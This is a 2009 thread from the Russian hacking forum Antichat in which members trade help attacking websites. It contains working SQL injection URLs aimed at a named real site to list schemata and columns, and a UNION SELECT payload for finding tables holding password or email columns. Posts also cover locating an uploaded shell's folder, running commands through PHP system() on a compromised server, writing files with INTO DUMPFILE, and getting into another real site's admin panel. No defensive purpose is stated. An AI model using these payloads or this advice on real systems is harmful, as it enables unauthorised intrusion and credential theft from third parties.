Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.11.2009, 16:33
|
|
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191
Репутация:
2562
|
|
Сообщение от dimonle
Знаю ток насчет xss,раньше вроде можно было делать через смайлы.(т.е.ты на свое сайте делаешь скрипт,скрываешь его под картинкой и вставляешь этот смайл в чате на юкозе)поищи что то подобное.а по поводу скуля вроде как нет.
это не xss была
|
|
|
14.11.2009, 16:35
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 2
Провел на форуме:
7499
Репутация:
0
|
|
Ребята, помогите разобраться. Нет сил уже, все перепробовал - не могу найти ничего полезного... Может быть так, что в базе нет логина и пароля?
http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,schema_name,3,4+from+information_ schema.schemata/*
http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,column_name,3,4+from+information_ schema.columns+where+table_schema=0x64625F70726F6D 74726163746F72/*
|
|
|
|
14.11.2009, 16:38
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо
|
|
|
|
14.11.2009, 16:43
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Shadrin
Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо
Посмотреть исходные коды.Ведь вайл вообще может сохраняться в папке,невидимой из веба.Ну или можно просканировать сайт на наличие директорий по виду:
PHP код:
up
upd
uploadfile
upload
...
|
|
|
|
14.11.2009, 16:49
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
А как гялнуть исходник ? сервер сразу выполняет,и я вижу страницу ошибки.. сканил по словарю бестолку...+ скан по линкам
iss 6.0/win32.
Последний раз редактировалось Shadrin; 14.11.2009 в 16:53..
|
|
|
|
14.11.2009, 16:50
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от jokester
safe_mode , open_basedir ?
нет safe_mode и запрещенных функций, команды выполняются нормально. open_basedir тоже нет. То есть system('ls -la'); с успехом выполнится но system('echo 1>1.txt'); уже никак
|
|
|
|
14.11.2009, 16:51
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Shadrin
Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо
Никак не понять, юзать мозг, выкладывать полную информацию о ДВИЖКЕ, потом думать и слушать советы зеленых. Скан тут не при чем.
|
|
|
|
14.11.2009, 16:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от bons
чем может быть объяснено следующее: у директории на сервере права drwxrwxrwx но записать в нее ничего не удается ни с помощью PHP ни с помощью INTO DUMPFILE в mysql. Места на диске хватает с избытком. Если смотреть stderr неудачного создания файла(например с помощью wget) то там лаконичное "permission denied"..
нет прав, вот и всё понимание. Вывод:
1. Попробовать изменить права (если получиться)
2. Лить из админки форума (цмс и т.д.)
PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного
|
|
|
|
14.11.2009, 16:57
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Chest3r
Ребята, помогите разобраться. Нет сил уже, все перепробовал - не могу найти ничего полезного... Может быть так, что в базе нет логина и пароля?
http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,schema_name,3,4+from+information_ schema.schemata/*
http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,column_name,3,4+from+information_ schema.columns+where+table_schema=0x64625F70726F6D 74726163746F72/*
Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции.
Я обычно использую такой запрос для поиска актуальных таблиц
1+union+select+1,table_name,3,4+from+information_s chema.columns+where+column_name+like+0x256d61696c2 5/*
Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп.
Сообщение от jecka3000
ElteRUS, смотри, www.pcci.org.za/admin - админка
Но опять же, в админку не попасть)
Ты хочешь чтобы я понегодовал вместе с тобой ? Ок. Злопакостные гоблины-администраторы не пускают нас в админку, мерзавцы !111
Факт, что ты нашел таблицу admins и извлек из нее логин\пароль не гарантирует тебе допуск в админку. Реальные данные авторизации админа могут находится в другой БД, в другой таблице (напр. users) , храниться в файле (напр. конфиге) или вообще могут быть прописаны в скрипте авторизации как константы (видел такое). Как повезет.
|
|
|
|
14.11.2009, 17:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Факт, что ты нашел таблицу admins и извлек из нее логин\пароль не гарантирует тебе допуск в админку. Реальные данные авторизации админа могут находится в другой БД, в другой таблице (напр. users) , храниться в файле (напр. конфиге) или вообще могут быть прописаны в скрипте авторизации как константы (видел такое). Как повезет.
И это как минимум. Хотят ломать, да еще чтобы легко было, да еше возмущаются, когда нелегко. Просто млею с таких постов.
ElteRUS + 500
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
